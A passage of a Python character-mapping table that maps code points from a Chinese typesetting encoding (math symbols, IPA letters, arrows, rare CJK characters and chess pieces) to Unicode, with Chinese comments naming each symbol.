0xAAB2: 0x2010, # 半字线 = ‒
0xAAB3: 0x002A, # 六角星号、呼应号 = *
0xAAB4: 0x0021, # 阶乘 = !
0xAAB5: 0x2202, # 偏导数 = ∂
0xAAB6: 0x2211, # 和 = ∑
0xAAB7: 0x220F, # 积 = ∏
0xAAB8: 0x2AEE, # 非因子号 = ⫮
0xAAB9: 0x2031, # 万分号 = ‱
0xAABA: 0x227B, # 前继 = ≻
0xAABB: 0x227A, # 后继 = ≺
0xAABC: 0x2282, # 包含于 = ⊂
0xAABD: 0x2283, # 包含 = ⊃
0xAABE: 0x225C, # Delta等于 = ≜
0xAABF: 0x00AC, # 否定 = ¬
0xAAC0: 0x22CD, # ⋍
0xAAC1: 0x2286, # 包含于 = ⊆
0xAAC2: 0x2287, # 包含 = ⊇
0xAAC3: 0x225C, # ≜
0xAAC4: 0x2243, # 近似符号 = ⋍
0xAAC5: 0x2265, # 大于等于 = ≥
0xAAC6: 0x2264, # 小于等于 = ≤
0xAAC7: 0x2214, # 穆勒连分符号、集合合 = ∔
0xAAC8: 0x2238, # 算术差 = ∸
0xAAC9: 0x2A30, # 直积号 = ⨰
0xAACA: 0x2271, # 不大于等于 = ≱
0xAACB: 0x2270, # 不小于等于 = ≰
0xAACC: 0x2AB0, # ⪰
0xAACD: 0x2AAF, # ⪯
0xAACE: 0x5350, # 卐
0xAACF: 0x212A, # 绝对温度单位 = K
0xAAD0: 0x2200, # 全称量词 = ∀
0xAAD1: 0x21D1, # ⇑
0xAAD2: 0x21E7, # ⇧
0xAAD3: 0x21BE, # ↾
0xAAD4: 0x21D3, # ⇓
0xAAD5: 0x21E9, # ⇩
0xAAD6: 0x21C3, # ⇃
0xAAD7: 0x2935, # ⤵
0xAAD8: 0x21E5, # ⇥
0xAAD9: 0x22F0, # 对角三连点 = ⋰
0xAADA: 0x21D4, # 等价 = ⇔
0xAADB: 0x21C6, # ⇆
0xAADC: 0x2194, # ↔
0xAADD: 0x21D2, # 推断 = ⇒
0xAADE: 0x21E8, # ⇨
0xAADF: 0x21C0, # ⇀
0xAAE0: 0x27F6, # ⟶
0xAAE1: 0x21D0, # ⇐
0xAAE2: 0x21E6, # ⇦
0xAAE3: 0x21BC, # ↼
0xAAE4: 0x27F5, # ⟵
0xAAE5: 0x2196, # ↖️
0xAAE6: 0x2199, # ↙️
0xAAE7: 0x2198, # ↘️
0xAAE8: 0x2197, # ↗️
0xAAE9: 0x22D5, # 平行等于 = ⋕
0xAAEA: 0x2AC5, # 包含于 = ⫅
0xAAEB: 0x2AC6, # 包含 = ⫆
0xAAEC: 0x29CB, # 相当于 = ⧋
0xAAED: 0x226B, # 远大于 = ≫
0xAAEE: 0x226A, # 远小于 = ≪
0xAAEF: 0x2A72, # 加或等于 = ⩲
0xAAF0: 0x22BB, # ⊻
0xAAF1: 0x2AE8, # 垂直等于 = ⫨
0xAAF2: 0x2277, # 大于或小于 = ≷
0xAAF3: 0x227D, # ≽
0xAAF4: 0x227C, # ≼
0xAAF5: 0x2109, # 华氏度 = ℉
0xAAF6: 0x2203, # 存在量词 = ∃
0xAAF7: 0x22F1, # 对角三连点 = ⋱
0xAAF9: 0x2241, # ≁
0xAAFA: 0x2244, # ≄
0xAAFB: 0x2276, # ≶
0xAAFC: 0x2209, # 不属于 = ∉
0xAAFD: 0x2267, # ≧
0xAAFE: 0x2266 # ≦
})
# Area AB
_update({
0xABA1: 0x224B, # ≋
0xABA2: 0x2262, # 不恒等于 = ≢
0xABA3: 0x2251, # 近似值号 = ≑
0xABA4: 0x2284, # 不包含于 = ⊄
0xABA5: 0x2285, # 不包含 = ⊅
0xABA6: 0x2259, # 相当于、等角的、估算 = ≙
0xABA7: 0x2205, # 空集 = ∅
0xABA8: 0x2207, # 微分算符 = ∇
0xABA9: 0x2A01, # 直和 = ⨁
0xABAA: 0x2A02, # 重积 = ⨂
0xABAB: 0x03F9, # 组合 = Ϲ
0xABAC: 0xABAC, # 对角六连点(⋰ + ⋰)
0xABAD: 0x263C, # ☼
0xABAE: 0xABAE, # (⚬ + ↑)
0xABAF: 0x2247, # 不近似等于 = ≇
0xABB0: 0x2249, # 不近似等于 = ≉
0xABB1: 0x2278, # 不小于大于 = ≸
0xABB2: 0x22F6, # 不属于 = ⋶
0xABB3: 0x2AFA, # 大于等于 = ⫺
0xABB4: 0x2AF9, # 小于等于 = ⫹
0xABB5: 0x2245, # 近似等于、接近 = ≅
0xABB6: 0x2267, # 大于等于 = ≧
0xABB7: 0x2250, # 近似等于 = ≐
0xABB8: 0x2266, # 小于等于 = ≦
0xABB9: 0x2A26, # 加或差 = ⨦
0xABBA: 0x2213, # 负或正、减或加 = ∓
0xABBB: 0x233F, # ⌿
0xABBC: 0x30FC, # 日文符号 = ー
0xABBD: 0xABBD, # 近似值号(· + ≈)
0xABBE: 0x2288, # 不包含于 = ⊈
0xABBF: 0x2289, # 不包含 = ⊉
0xABC0: 0x225A, # 角相等 = ≚
0xABC1: 0x2205, # 空集 = ∅
0xABC2: 0x2205, # (diagonal 卐)
0xABC3: 0x0024, # $
0xABC4: 0x2709, # ✉
0xABC5: 0x272E, # ✮
0xABC6: 0x272F, # ✯
0xABC7: 0x2744, # ❄
0xABC8: 0x211E, # 处方符号 = ℞
0xABC9: 0x1D110, # 𝄐
0xABCA: 0x2034, # 三次微分 = ‴
0xABCB: 0xABCB, # 对角六连点(⋱ + ⋱)
0xABCC: 0x2ACB, # 真包含于 = ⫋
0xABCD: 0x2ACC, # 真包含 = ⫌
0xABCE: 0x2A63, # ⩣
0xABCF: 0xABCF, # 约数0(0 + \)
0xABD0: 0xABD0, # 约数1(1 + \)
0xABD1: 0xABD1, # 约数2(2 + \)
0xABD2: 0xABD2, # 约数3(3 + \)
0xABD3: 0xABD3, # 约数4(4 + \)
0xABD4: 0xABD4, # 约数5(5 + \)
0xABD5: 0xABD5, # 约数6(6 + \)
0xABD6: 0xABD6, # 约数7(7 + \)
0xABD7: 0xABD7, # 约数8(8 + \)
0xABD8: 0xABD8, # 约数9(9 + \)
0xABD9: 0x216C, # 罗马数字50 = Ⅼ
0xABDA: 0x216D, # 罗马数字100 = Ⅽ
0xABDB: 0x216E, # 罗马数字500 = Ⅾ
0xABDC: 0x216F, # 罗马数字1000 = Ⅿ
0xABDD: 0x2295, # 圈加 = ⊕
0xABDE: 0xABDE, # 圈加减(◯ + ±)
0xABDF: 0x2296, # 圈减 = ⊖
0xABE0: 0xABE0, # 圈点减(◯ + ∸)
0xABE1: 0x2297, # 圈乘 = ⊗
0xABE2: 0x2A38, # 圈除 = ⨸
0xABE3: 0x229C, # 圈等于 = ⊜
0xABE4: 0xABE4, # 交流电机(◯ + ∼)
0xABE5: 0xABE5, # 圈大于等于(◯ + ≥)
0xABE6: 0xABE6, # 圈小于等于(◯ + ≤)
0xABE7: 0x224A, # 近似等于 = ≊
0xABE8: 0xABE8, # (> + >)
0xABE9: 0xABE9, # (< + <)
0xABEA: 0x22DB, # 大于等于小于 = ⋛
0xABEB: 0x22DA, # 小于等于大于 = ⋚
0xABEC: 0x2A8C, # 大于等于小于 = ⪌
0xABED: 0x2A8B, # 小于等于大于 = ⪋
0xABEE: 0x2273, # ≳
0xABEF: 0x2272, # ≲
0xABF0: 0x29A5, # ⦥
0xABF1: 0x29A4, # ⦤
0xABF2: 0x2660, # 黑桃 = ♠
0xABF3: 0x2394, # 正六边形 = ⎔
0xABF4: 0x2B20, # 正五边形 = ⬠
0xABF5: 0x23E2, # 梯形 = ⏢
0xABF6: 0x2663, # 梅花 = ♣
0xABF7: 0x25B1, # 平行四边形 = ▱
0xABF8: 0x25AD, # 矩形 = ▭
0xABF9: 0x25AF, # 矩形 = ▯
0xABFA: 0x2665, # 红桃 = ♥
0xABFB: 0x2666, # 方块 = ♦
0xABFC: 0x25C1, # 三角形(向左) = ◁
0xABFD: 0x25BD, # 三角形(向下) = ▽
0xABFE: 0x25BD # 三角形(向右) = ▷
})
# Area AC
_update({
0xACA1: 0x25C0, # 实三角形(向左) = ◀
0xACA2: 0x25BC, # 实三角形(向下) = ▼
0xACA3: 0x25B6, # 实三角形(向右) = ▶
0xACA4: 0x25FA, # 直角三角形 = ◺
0xACA5: 0x22BF, # 直角三角形 = ⊿
0xACA6: 0x25B3, # △
0xACA7: 0x27C1, # ⟁
0xACA8: 0x2BCE, # ⯎
0xACA9: 0x2B2F, # ⬯
0xACAA: 0xACAA, # (⬯ + ∥)
0xACAB: 0x2B2E, # ⬮
0xACAC: 0x2279, # 不大于小于 = ≹
0xACAD: 0x1D10B, # 𝄋
0xACAE: 0x2218, # 圈乘 = ∘
0xACAF: 0xACAF, # (vertical ≈)
0xACB2: 0xACB2, # (F-like symbol)
0xACB3: 0x22A6, # ⊦
0xACB4: 0x22A7, # ⊧
0xACB5: 0x22A8, # ⊨
0xACB6: 0x29FA, # 强阳二值 = ⧺
0xACB7: 0x29FB, # 强阳三值 = ⧻
0xACB8: 0xACB8, # 强阳四值(++++)
0xACB9: 0x291A, # ⤚
0xACBA: 0xACBA, # (⤙ + _)
0xACBB: 0xACBB, # (⤚ + _)
0xACBC: 0x2713, # 勾 = ✓
0xACBD: 0x22CE, # ⋎
0xACBE: 0xACBE, # (V + \)
0xACBF: 0xACBF, # (ˇ + | + ꞈ)
0xACC0: 0x224E, # 相当于、等值于 = ≎
0xACC1: 0x224F, # 间差 = ≏
0xACC2: 0x23D3, # ⏓
0xACC3: 0xACC3, # (◡ + _)
0xACC4: 0xACC4, # (◡ + _ + /)
0xACC5: 0x2715, # ✕
0xACC6: 0xACC6, # (✕ + •)
0xACC8: 0xACC8, # (∩ + ˜)
0xACC9: 0xACC9, # (∪ + ˜)
0xACCA: 0xACCA, # (V̰)
0xACCB: 0xACCB, # (V̱)
0xACCC: 0xACCC, # (V̱̰)
0xACCD: 0x2126, # Ω
0xACCE: 0x221D, # 成正比 = ∝
0xACCF: 0x29A0, # 角 = ⦠
0xACD0: 0x2222, # 角 = ∢
0xACD1: 0x2AAC, # 小于等于 = ⪬
0xACD2: 0x2239, # 差 = ∹
0xACD3: 0x223A, # ∺
0xACD4: 0x2135, # ℵ
0xACD5: 0xACD5, # (⊃ + ᐣ)
0xACD6: 0xACD6, # (⊃ + ᐣ + /)
0xACD7: 0x21CC, # ⇌
0xACD8: 0x274B, # ❋
0xACD9: 0x2B01, # ⬁
0xACDA: 0x2B03, # ⬃
0xACDB: 0x2B02, # ⬂
0xACDC: 0x2B00, # ⬀
0xACDD: 0xACDD, # (△ + ▾)
0xACDE: 0xACDE, # (▲ + ▿)
0xACDF: 0xACDE, # (( + —)
0xACE0: 0xACE0, # ([ + —)
0xACE1: 0xACE1, # ([ + —)
0xACE2: 0xACE2, # () + —)
0xACE3: 0xACE3, # (] + —)
0xACE4: 0xACE4, # (] + —)
0xACE5: 0xACE5, # (] + — + ₙ)
0xACE6: 0xACE6, # (] + — + ₘ)
0xACE7: 0xACE7, # (] + — + ₓ)
0xACE8: 0xACE8, # () + — + ₙ)
0xACE9: 0x2233, # 逆时针环积分 = ∳
0xACEA: 0x2232, # 顺时针环积分 = ∲
0xACEB: 0x222C, # 二重积分 = ∬
0xACEC: 0x222F, # 二重环积分 = ∯
0xACED: 0x222D, # 三重积分 = ∭
0xACEE: 0x2230, # 三重环积分 = ∰
0xACEF: 0x0421, # 组合符号 = С
0xACF0: 0x2019, # 所有格符 = ’
0xACF1: 0x0027, # 重音节符号 = '
0xACF2: 0x03A3, # 和(正文态) = Σ
0xACF3: 0x03A0, # 积(正文态) = Π
0xACF4: 0x02C7, # 注音符号 = ˇ
0xACF5: 0x02CB, # 注音符号 = ˋ
0xACF6: 0x02CA, # 注音符号 = ˊ
0xACF7: 0x02D9, # 注音符号 = ˙
0xACF8: 0x29F72, # 𩽲
0xACF9: 0x362D, # 㘭
0xACFA: 0x3A52, # 㩒
0xACFB: 0x3E74, # 㹴
0xACFC: 0x27741, # 𧝁
0xACFD: 0x30FC, # 日文长音记号 = ー
0xACFE: 0x2022 # 注音符号 = •
})
# Area AD
_update({
0xADA1: 0x3280, # 中文阳圈码一 = ㊀
0xADA2: 0x3281, # 中文阳圈码二 = ㊁
0xADA3: 0x3282, # 中文阳圈码三 = ㊂
0xADA4: 0x3283, # 中文阳圈码四 = ㊃
0xADA5: 0x3284, # 中文阳圈码五 = ㊄
0xADA6: 0x3285, # 中文阳圈码六 = ㊅
0xADA7: 0x3286, # 中文阳圈码七 = ㊆
0xADA8: 0x3287, # 中文阳圈码八 = ㊇
0xADA9: 0x3288, # 中文阳圈码九 = ㊈
0xADAA: 0xADAA, # 中文阳圈码一零(◯ + 一〇)
0xADAB: 0xADAB, # 中文阳圈码一一(◯ + 一一)
0xADAC: 0xADAC, # 中文阳圈码一二(◯ + 一二)
0xADAD: 0xADAD, # 中文阳圈码一三(◯ + 一三)
0xADAE: 0xADAE, # 中文阳圈码一四(◯ + 一四)
0xADAF: 0xADAF, # 中文阳圈码一五(◯ + 一五)
0xADB0: 0xADB0, # 中文阳圈码一六(◯ + 一六)
0xADB1: 0xADB1, # 中文阳圈码一七(◯ + 一七)
0xADB2: 0xADB2, # 中文阳圈码一八(◯ + 一八)
0xADB3: 0xADB3, # 中文阳圈码一九(◯ + 一九)
0xADB4: 0xADB4, # 中文阳圈码二零(◯ + 二〇)
0xADB5: 0x24EA, # 数字阳圈码0 = ⓪
0xADB6: 0x2018, # 外文左单引号 = ‘
0xADB7: 0x201C, # 外文左双引号 = “
0xADB8: 0x2019, # 外文右单引号 = ’
0xADB9: 0x201D, # 外文右双引号 = ”
0xADBA: 0x025B, # 国际音标 = ɛ
0xADBB: 0x0251, # 国际音标 = ɑ
0xADBC: 0x0259, # 国际音标 = ə
0xADBD: 0x025A, # 国际音标 = ɚ
0xADBE: 0x028C, # 国际音标 = ʌ
0xADBF: 0x0254, # 国际音标 = ɔ
0xADC0: 0x0283, # 国际音标 = ʃ
0xADC1: 0x02D1, # 国际音标 = ˑ
0xADC2: 0x02D0, # 国际音标 = ː
0xADC3: 0x0292, # 国际音标 = ʒ
0xADC4: 0x0261, # 国际音标 = ɡ
0xADC5: 0x03B8, # 国际音标 = θ
0xADC6: 0x00F0, # 国际音标 = ð
0xADC7: 0x014B, # 国际音标 = ŋ
0xADC8: 0x0264, # 国际音标 = ɤ
0xADC9: 0x0258, # 国际音标 = ɘ
0xADCA: 0x026A, # 国际音标 = ɪ
0xADCB: 0x0268, # 国际音标 = ɨ
0xADCC: 0x027F, # 国际音标 = ɿ
0xADCD: 0x0285, # 国际音标 = ʅ
0xADCE: 0x028A, # 国际音标 = ʊ
0xADCF: 0x00F8, # 国际音标 = ø
0xADD0: 0x0275, # 国际音标 = ɵ
0xADD1: 0x026F, # 国际音标 = ɯ
0xADD2: 0x028F, # 国际音标 = ʏ
0xADD3: 0x0265, # 国际音标 = ɥ
0xADD4: 0x0289, # 国际音标 = ʉ
0xADD5: 0x0278, # 国际音标 = ɸ
0xADD6: 0x0288, # 国际音标 = ʈ
0xADD7: 0x0290, # 国际音标 = ʐ
0xADD8: 0x0256, # 国际音标 = ɖ
0xADD9: 0x0282, # 国际音标 = ʂ
0xADDA: 0x0272, # 国际音标 = ɲ
0xADDB: 0x0271, # 国际音标 = ɱ
0xADDC: 0x03B3, # 国际音标 = γ
0xADDD: 0x0221, # 国际音标 = ȡ
0xADDE: 0x0255, # 国际音标 = ɕ
0xADDF: 0x0235, # 国际音标 = ȵ
0xADE0: 0x0291, # 国际音标 = ʑ
0xADE1: 0x0236, # 国际音标 = ȶ
0xADE2: 0x026C, # 国际音标 = ɬ
0xADE3: 0x028E, # 国际音标 = ʎ
0xADE4: 0x1D84, # 国际音标 = ᶄ
0xADE5: 0xAB53, # 国际音标 = ꭓ
0xADE6: 0x0127, # 国际音标 = ħ
0xADE7: 0x0263, # 国际音标 = ɣ
0xADE8: 0x0281, # 国际音标 = ʁ
0xADE9: 0x0294, # 国际音标 = ʔ
0xADEA: 0x0295, # 国际音标 = ʕ
0xADEB: 0x0262, # 国际音标 = ɢ
0xADEC: 0x0266, # 国际音标 = ɦ
0xADED: 0x4C7D, # 䱽
0xADEE: 0x24B6D, # 𤭭
0xADEF: 0x00B8, # 新蒙文 = ¸
0xADF0: 0x02DB, # 新蒙文 = ˛
0xADF1: 0x04D8, # 新蒙文 = Ә
0xADF2: 0x04BA, # 新蒙文 = Һ
0xADF3: 0x0496, # 新蒙文 = Җ
0xADF4: 0x04A2, # 新蒙文 = Ң
0xADF5: 0x2107B, # 𡁻
0xADF6: 0x2B62C, # 𫘬
0xADF7: 0x04D9, # 新蒙文 = ә
0xADF8: 0x04BB, # 新蒙文 = һ
0xADF9: 0x0497, # 新蒙文 = җ
0xADFA: 0x04A3, # 新蒙文 = ң
0xADFB: 0x40CE, # 䃎
0xADFC: 0x04AF, # 新蒙文 = ү
0xADFD: 0x02CC, # 次重音符号 = ˌ
0xADFE: 0xff40 # 次重音符号 = `
})
# Area F8
_update({
0xF8A1: 0x5C2A, # 尪
0xF8A2: 0x97E8, # 韨
0xF8A3: 0x5F67, # 彧
0xF8A4: 0x672E, # 朮
0xF8A5: 0x4EB6, # 亶
0xF8A6: 0x53C6, # 叆
0xF8A7: 0x53C7, # 叇
0xF8A8: 0x8BBB, # 讻
0xF8A9: 0x27BAA, # 𧮪
0xF8AA: 0x8BEA, # 诪
0xF8AB: 0x8C09, # 谉
0xF8AC: 0x8C1E, # 谞
0xF8AD: 0x5396, # 厖
0xF8AE: 0x9EE1, # 黡
0xF8AF: 0x533D, # 匽
0xF8B0: 0x5232, # 刲
0xF8B1: 0x6706, # 朆
0xF8B2: 0x50F0, # 僰
0xF8B3: 0x4F3B, # 伻
0xF8B4: 0x20242, # 𠉂
0xF8B5: 0x5092, # 傒
0xF8B6: 0x5072, # 偲
0xF8B7: 0x8129, # 脩
0xF8B8: 0x50DC, # 僜
0xF8B9: 0x90A0, # 邠
0xF8BA: 0x9120, # 鄠
0xF8BB: 0x911C, # 鄜
0xF8BC: 0x52BB, # 劻
0xF8BD: 0x52F7, # 勷
0xF8BE: 0x6C67, # 汧
0xF8BF: 0x6C9A, # 沚
0xF8C0: 0x6C6D, # 汭
0xF8C1: 0x6D34, # 洴
0xF8C2: 0x6D50, # 浐
0xF8C3: 0x6D49, # 浉
0xF8C4: 0x6DA2, # 涢
0xF8C5: 0x6D65, # 浥
0xF8C6: 0x6DF4, # 淴
0xF8C7: 0x6EEA, # 滪
0xF8C8: 0x6E87, # 溇
0xF8C9: 0x6EC9, # 滉
0xF8CA: 0x6FBC, # 澼
0xF8CB: 0x6017, # 怗
0xF8CC: 0x22650, # 𢙐
0xF8CD: 0x6097, # 悗
0xF8CE: 0x60B0, # 悰
0xF8CF: 0x60D3, # 惓
0xF8D0: 0x6153, # 慓
0xF8D1: 0x5BAC, # 宬
0xF8D2: 0x5EBC, # 庼
0xF8D3: 0x95EC, # 闬
0xF8D4: 0x95FF, # 闿
0xF8D5: 0x9607, # 阇
0xF8D6: 0x9613, # 阓
0xF8D7: 0x961B, # 阛
0xF8D8: 0x631C, # 挜
0xF8D9: 0x630C, # 挌
0xF8DA: 0x63AF, # 掯
0xF8DB: 0x6412, # 搒
0xF8DC: 0x63F3, # 揳
0xF8DD: 0x6422, # 搢
0xF8DE: 0x5787, # 垇
0xF8DF: 0x57B5, # 垵
0xF8E0: 0x57BD, # 垽
0xF8E1: 0x57FC, # 埼
0xF8E2: 0x56AD, # 嚭
0xF8E3: 0x26B4C, # 𦭌
0xF8E4: 0x8313, # 茓
0xF8E5: 0x8359, # 荙
0xF8E6: 0x82F3, # 苳
0xF8E7: 0x8399, # 莙
0xF8E8: 0x44D6, # 䓖
0xF8E9: 0x841A, # 萚
0xF8EA: 0x83D1, # 菑
0xF8EB: 0x84C2, # 蓂
0xF8EC: 0x8439, # 萹
0xF8ED: 0x844E, # 葎
0xF8EE: 0x8447, # 葇
0xF8EF: 0x84DA, # 蓚
0xF8F0: 0x26D9F, # 𦶟
0xF8F1: 0x849F, # 蒟
0xF8F2: 0x84BB, # 蒻
0xF8F3: 0x850A, # 蔊
0xF8F4: 0x26ED8, # 𦻘
0xF8F5: 0x85A2, # 薢
0xF8F6: 0x85B8, # 薸
0xF8F7: 0x85E8, # 藨
0xF8F8: 0x8618, # 蘘
0xF8F9: 0x596D, # 奭
0xF8FA: 0x546F, # 呯
0xF8FB: 0x54A5, # 咥
0xF8FC: 0x551D, # 唝
0xF8FD: 0x5536, # 唶
0xF8FE: 0x556F # 啯
})
# Area F9
_update({
0xF9A1: 0x5621, # 嘡
0xF9A2: 0x20E01, # 𠸁
0xF9A3: 0x20F90, # 𠾐
0xF9A4: 0x360E, # 㘎
0xF9A5: 0x56F7, # 囷
0xF9A6: 0x5E21, # 帡
0xF9A7: 0x5E28, # 帨
0xF9A8: 0x5CA8, # 岨
0xF9A9: 0x5CE3, # 峣
0xF9AA: 0x5D5A, # 嵚
0xF9AB: 0x5D4E, # 嵎
0xF9AC: 0x5D56, # 嵖
0xF9AD: 0x5DC2, # 巂
0xF9AE: 0x8852, # 衒
0xF9AF: 0x5FAF, # 徯
0xF9B0: 0x5910, # 夐
0xF9B1: 0x7330, # 猰
0xF9B2: 0x247EF, # 𤟯
0xF9B3: 0x734F, # 獏
0xF9B4: 0x9964, # 饤
0xF9B5: 0x9973, # 饳
0xF9B6: 0x997E, # 饾
0xF9B7: 0x9982, # 馂
0xF9B8: 0x9989, # 馉
0xF9B9: 0x5C43, # 屃
0xF9BA: 0x5F36, # 弶
0xF9BB: 0x5B56, # 孖
0xF9BC: 0x59EE, # 姮
0xF9BD: 0x5AEA, # 嫪
0xF9BE: 0x7ED6, # 绖
0xF9BF: 0x7F0A, # 缊
0xF9C0: 0x7E34, # 縴
0xF9C1: 0x7F1E, # 缞
0xF9C2: 0x26221, # 𦈡
0xF9C3: 0x9A8E, # 骎
0xF9C4: 0x29A02, # 𩨂
0xF9C5: 0x9A95, # 骕
0xF9C6: 0x9AA6, # 骦
0xF9C7: 0x659D, # 斝
0xF9C8: 0x241A2, # 𤆢
0xF9C9: 0x712E, # 焮
0xF9CA: 0x7943, # 祃
0xF9CB: 0x794E, # 祎
0xF9CC: 0x7972, # 祲
0xF9CD: 0x7395, # 玕
0xF9CE: 0x73A0, # 玠
0xF9CF: 0x7399, # 玙
0xF9D0: 0x73B1, # 玱
0xF9D1: 0x73F0, # 珰
0xF9D2: 0x740E, # 琎
0xF9D3: 0x742F, # 琯
0xF9D4: 0x7432, # 琲
0xF9D5: 0x67EE, # 柮
0xF9D6: 0x6812, # 栒
0xF9D7: 0x3B74, # 㭴
0xF9D8: 0x6872, # 桲
0xF9D9: 0x68BC, # 梼
0xF9DA: 0x68B9, # 梹
0xF9DB: 0x68C1, # 棁
0xF9DC: 0x696F, # 楯
0xF9DD: 0x69A0, # 榠
0xF9DE: 0x69BE, # 榾
0xF9DF: 0x69E5, # 槥
0xF9E0: 0x6A9E, # 檞
0xF9E1: 0x69DC, # 槜
0xF9E2: 0x6B95, # 殕
0xF9E3: 0x80FE, # 胾
0xF9E4: 0x89F1, # 觱
0xF9E5: 0x74FB, # 瓻
0xF9E6: 0x7503, # 甃
0xF9E7: 0x80D4, # 胔
0xF9E8: 0x22F7E, # 𢽾
0xF9E9: 0x668D, # 暍
0xF9EA: 0x9F12, # 鼒
0xF9EB: 0x6F26, # 漦
0xF9EC: 0x8D51, # 赑
0xF9ED: 0x8D52, # 赒
0xF9EE: 0x8D57, # 赗
0xF9EF: 0x7277, # 牷
0xF9F0: 0x7297, # 犗
0xF9F1: 0x23C5D, # 𣱝
0xF9F2: 0x8090, # 肐
0xF9F3: 0x43F2, # 䏲
0xF9F4: 0x6718, # 朘
0xF9F5: 0x8158, # 腘
0xF9F6: 0x81D1, # 臑
0xF9F7: 0x7241, # 牁
0xF9F8: 0x7242, # 牂
0xF9F9: 0x7A85, # 窅
0xF9FA: 0x7A8E, # 窎
0xF9FB: 0x7ABE, # 窾
0xF9FC: 0x75A2, # 疢
0xF9FD: 0x75AD, # 疭
0xF9FE: 0x75CE # 痎
})
# Area FA
_update({
0xFAA1: 0x3FA6, # 㾦
0xFAA2: 0x7604, # 瘄
0xFAA3: 0x7606, # 瘆
0xFAA4: 0x7608, # 瘈
0xFAA5: 0x24ECA, # 𤻊
0xFAA6: 0x88C8, # 裈
0xFAA7: 0x7806, # 砆
0xFAA8: 0x7822, # 砢
0xFAA9: 0x7841, # 硁
0xFAAA: 0x7859, # 硙
0xFAAB: 0x785A, # 硚
0xFAAC: 0x7875, # 硵
0xFAAD: 0x7894, # 碔
0xFAAE: 0x40DA, # 䃚
0xFAAF: 0x790C, # 礌
0xFAB0: 0x771C, # 眜
0xFAB1: 0x251A7, # 𥆧
0xFAB2: 0x7786, # 瞆
0xFAB3: 0x778B, # 瞋
0xFAB4: 0x7564, # 畤
0xFAB5: 0x756C, # 畬
0xFAB6: 0x756F, # 畯
0xFAB7: 0x76C9, # 盉
0xFAB8: 0x76DD, # 盝
0xFAB9: 0x28C3E, # 𨰾
0xFABA: 0x497A, # 䥺
0xFABB: 0x94D3, # 铓
0xFABC: 0x94E6, # 铦
0xFABD: 0x9575, # 镵
0xFABE: 0x9520, # 锠
0xFABF: 0x9527, # 锧
0xFAC0: 0x28C4F, # 𨱏
0xFAC1: 0x9543, # 镃
0xFAC2: 0x953D, # 锽
0xFAC3: 0x28C4E, # 𨱎
0xFAC4: 0x28C54, # 𨱔
0xFAC5: 0x28C53, # 𨱓
0xFAC6: 0x9574, # 镴
0xFAC7: 0x79FE, # 秾
0xFAC8: 0x7A16, # 稖
0xFAC9: 0x415F, # 䅟
0xFACA: 0x7A5E, # 穞
0xFACB: 0x9E30, # 鸰
0xFACC: 0x9E34, # 鸴
0xFACD: 0x9E27, # 鸧
0xFACE: 0x9E2E, # 鸮
0xFACF: 0x9E52, # 鹒
0xFAD0: 0x9E53, # 鹓
0xFAD1: 0x9E59, # 鹙
0xFAD2: 0x9E56, # 鹖
0xFAD3: 0x9E61, # 鹡
0xFAD4: 0x9E6F, # 鹯
0xFAD5: 0x77DE, # 矞
0xFAD6: 0x76B6, # 皶
0xFAD7: 0x7F91, # 羑
0xFAD8: 0x7F93, # 羓
0xFAD9: 0x26393, # 𦎓
0xFADA: 0x7CA6, # 粦
0xFADB: 0x43AC, # 䎬
0xFADC: 0x8030, # 耰
0xFADD: 0x8064, # 聤
0xFADE: 0x8985, # 覅
0xFADF: 0x9892, # 颒
0xFAE0: 0x98A3, # 颣
0xFAE1: 0x8683, # 蚃
0xFAE2: 0x86B2, # 蚲
0xFAE3: 0x45AC, # 䖬
0xFAE4: 0x8705, # 蜅
0xFAE5: 0x8730, # 蜰
0xFAE6: 0x45EA, # 䗪
0xFAE7: 0x8758, # 蝘
0xFAE8: 0x7F4D, # 罍
0xFAE9: 0x7B4A, # 筊
0xFAEA: 0x41F2, # 䇲
0xFAEB: 0x7BF0, # 篰
0xFAEC: 0x7C09, # 簉
0xFAED: 0x7BEF, # 篯
0xFAEE: 0x7BF2, # 篲
0xFAEF: 0x7C20, # 簠
0xFAF0: 0x26A2D, # 𦨭
0xFAF1: 0x8C68, # 豨
0xFAF2: 0x8C6D, # 豭
0xFAF3: 0x8DF6, # 跶
0xFAF4: 0x8E04, # 踄
0xFAF5: 0x8E26, # 踦
0xFAF6: 0x8E16, # 踖
0xFAF7: 0x8E27, # 踧
0xFAF8: 0x8E53, # 蹓
0xFAF9: 0x8E50, # 蹐
0xFAFA: 0x8C90, # 貐
0xFAFB: 0x9702, # 霂
0xFAFC: 0x9F81, # 龁
0xFAFD: 0x9F82, # 龂
0xFAFE: 0x9C7D # 鱽
})
# Area FB
_update({
0xFBA1: 0x9C8A, # 鲊
0xFBA2: 0x9C80, # 鲀
0xFBA3: 0x9C8F, # 鲏
0xFBA4: 0x4C9F, # 䲟
0xFBA5: 0x9C99, # 鲙
0xFBA6: 0x9C97, # 鲗
0xFBA7: 0x29F7C, # 𩽼
0xFBA8: 0x9C96, # 鲖
0xFBA9: 0x29F7E, # 𩽾
0xFBAA: 0x29F83, # 𩾃
0xFBAB: 0x29F87, # 𩾇
0xFBAC: 0x9CC1, # 鳁
0xFBAD: 0x9CD1, # 鳑
0xFBAE: 0x9CDB, # 鳛
0xFBAF: 0x9CD2, # 鳒
0xFBB0: 0x29F8C, # 𩾌
0xFBB1: 0x9CE3, # 鳣
0xFBB2: 0x977A, # 靺
0xFBB3: 0x97AE, # 鞮
0xFBB4: 0x97A8, # 鞨
0xFBB5: 0x9B4C, # 魌
0xFBB6: 0x9B10, # 鬐
0xFBB7: 0x9B18, # 鬘
0xFBB8: 0x9E80, # 麀
0xFBB9: 0x9E95, # 麕
0xFBBA: 0x9E91, # 麑
})
"B库符号(部分非组合用字符)"
symbolsB = UnicodeMap()
symbolsB.update({
0x8940: 0x1E37, # 国际音标 = ḷ
0x8941: 0x1E43, # 国际音标 = ṃ
0x8942: 0x1E47, # 国际音标 = ṇ
0x8943: 0x015E, # 国际音标 = Ş
0x8944: 0x015F, # 国际音标 = ş
0x8945: 0x0162, # 国际音标 = Ţ
0x8946: 0x0163, # 国际音标 = ţ
0x94C0: 0x2654, # 国际象棋白格白子-王 = ♔
0x94C1: 0x2655, # 国际象棋白格白子-后 = ♕
0x94C2: 0x2656, # 国际象棋白格白子-车 = ♖
0x94C3: 0x2658, # 国际象棋白格白子-马 = ♘
0x94C4: 0x2657, # 国际象棋白格白子-相 = ♗
0x94C5: 0x2659, # 国际象棋白格白子-卒 = ♙
0x94C6: 0x265A, # 国际象棋白格黑子-王 = ♚
0x94C7: 0x265B, # 国际象棋白格黑子-后 = ♛
0x94C8: 0x265C, # 国际象棋白格黑子-车 = ♜
